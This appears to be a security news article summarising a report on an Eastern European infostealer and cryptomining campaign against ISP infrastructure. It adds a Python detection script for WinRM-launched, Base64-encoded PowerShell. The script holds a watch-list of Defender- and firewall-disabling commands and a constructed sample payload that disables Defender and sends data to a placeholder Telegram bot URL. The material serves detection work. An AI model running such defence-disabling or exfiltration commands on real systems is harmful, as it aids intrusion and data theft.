
A new report from the Splunk Threat Research Team describes a widespread infostealer and cryptomining campaign targeting Internet Service Provider (ISP) infrastructure on the West Coast of the United States and in China. The campaign, believed to originate from Eastern Europe, combines brute-force attacks, credential abuse, data exfiltration, and cryptomining payloads to compromise ISP infrastructure.
The Splunk Threat Research Team observed that over 4,000 IP addresses belonging to ISPs in the U.S. and China were specifically targeted. The operators rely on minimally intrusive techniques, which helps them stay below the threshold of most detection.
According to the report: “This mass exploitation campaign originates from Eastern Europe and uses simple tools that abuse victim’s computer processing power to install cryptomining payloads and binaries with diverse functions.”
Among the functions observed were:
- Brute force attacks on weak credentials for initial access
- Persistence mechanisms that disable remote access and security tools
- Deployment of additional crimeware
- Data exfiltration via Command and Control (C2) servers
- Ability to self-terminate to evade detection
The attackers relied on scripting languages such as Python and PowerShell, which let them operate in restricted environments without dropping compiled tooling. Calls to the Telegram Bot API served as the command-and-control (C2) channel.
Once access was obtained, the attackers dropped various binaries into a folder named Migration, which contained infostealer payloads and cryptominers. The key malicious files identified included:
- mig.rdp.exe – Used to facilitate further payload execution.
- Migrate.exe – Deployed various malware components.
- X64.exe – Responsible for launching additional scripts and malware payloads.
One of the most concerning aspects of the attack is its automated data collection and clipboard hijacking, which targets cryptocurrency wallet addresses copied by the victim. The malware also captures screenshots and transmits them to a Telegram bot acting as the C2 server: “The malware sends this data to its C2 server, which operates via a Telegram bot.”
The report highlights the abuse of Windows Remote Management (WinRM) as a key attack vector: “Once the username and password were recovered, it will execute WINRM service to deploy the payload.”
Execution over WinRM let the attackers run Base64-encoded PowerShell scripts that disabled security defenses and launched malware silently. The attackers also used the Masscan port scanner to sweep large IP ranges for systems exposing services they could attack.
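The chain in the two paragraphs above (a WinRM session spawning PowerShell, an encoded command line, defense-disabling cmdlets inside it, and a Telegram bot URL used for C2) is the kind of thing a detection engineer would want to catch from process-creation telemetry. The following is an added example written for this page, not code from the Splunk Threat Research Team or from the report. It assumes Sysmon-style process-creation events with parent image, image and command line, uses the fact that remote WinRM commands run under `wsmprovhost.exe`, and decodes `-EncodedCommand` arguments (Base64 of UTF-16LE) before matching. The watch-list of defense-disabling commands and the sample events are constructed for the example.

```python
"""Detect the WinRM -> encoded PowerShell -> disable-defenses -> Telegram C2 chain
in process-creation events. Added example; not the Splunk team's code."""
import base64
import re
from dataclasses import dataclass

# Assumption: a minimal watch-list of commands that weaken endpoint defenses.
DEFENSE_DISABLE_PATTERNS = [
    r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true",
    r"(?:Set|Add)-MpPreference\s+-ExclusionPath",
    r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off",
    r"Stop-Service\b.*\b(?:WinDefend|Sense)\b",
]
TELEGRAM_C2 = re.compile(r"api\.telegram\.org/bot", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+"
    r"([A-Za-z0-9+/=]+)",
    re.I,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcEvent):
    """Return the list of findings for one event, in fixed order."""
    findings = []
    image = event.image.lower().rsplit("\\", 1)[-1]
    parent = event.parent_image.lower().rsplit("\\", 1)[-1]
    # Remote WinRM commands are hosted by wsmprovhost.exe on the target.
    if parent == "wsmprovhost.exe" and image in ("powershell.exe", "pwsh.exe"):
        findings.append("powershell_via_winrm")
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        findings.append("encoded_powershell")
    # Match on the raw command line plus the decoded script, so encoding
    # does not hide the defense-disabling commands or the C2 URL.
    text = event.command_line + ("\n" + decoded if decoded else "")
    if any(re.search(p, text, re.I) for p in DEFENSE_DISABLE_PATTERNS):
        findings.append("defense_disabled")
    if TELEGRAM_C2.search(text):
        findings.append("telegram_c2")
    return findings


# Constructed sample events: one benign, one matching the full chain, one
# WinRM-spawned shell without the rest of the chain.
MALICIOUS_SCRIPT = (
    "Set-MpPreference -DisableRealtimeMonitoring $true; "
    "Invoke-WebRequest https://api.telegram.org/bot000:TOKEN/sendDocument"
)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
    ProcEvent(r"C:\Windows\System32\wsmprovhost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(MALICIOUS_SCRIPT)),
    ProcEvent(r"C:\Windows\System32\wsmprovhost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Process"),
]


def run_all(events=SAMPLE_EVENTS):
    return {i: analyze(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for idx, findings in run_all().items():
        print(idx, findings or "clean")
```

Only the second sample event trips all four findings; a WinRM-spawned shell on its own is normal on a managed estate, so a real rule should weight `powershell_via_winrm` low and alert on its combination with `encoded_powershell` plus either of the other two.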
The malware’s ultimate objective appears to be monetization through XMRig cryptomining operations, alongside data theft. Among the identified components was MicrosoftPrt.exe, a clipbanker malware used for stealing cryptocurrency wallet information. Other binaries, such as Superfetch.exe and ApplicationFrame.exe, were linked to mining operations.
To ensure persistence, the attackers manipulated Windows registry keys and modified file access permissions so that administrators could not remove the malware.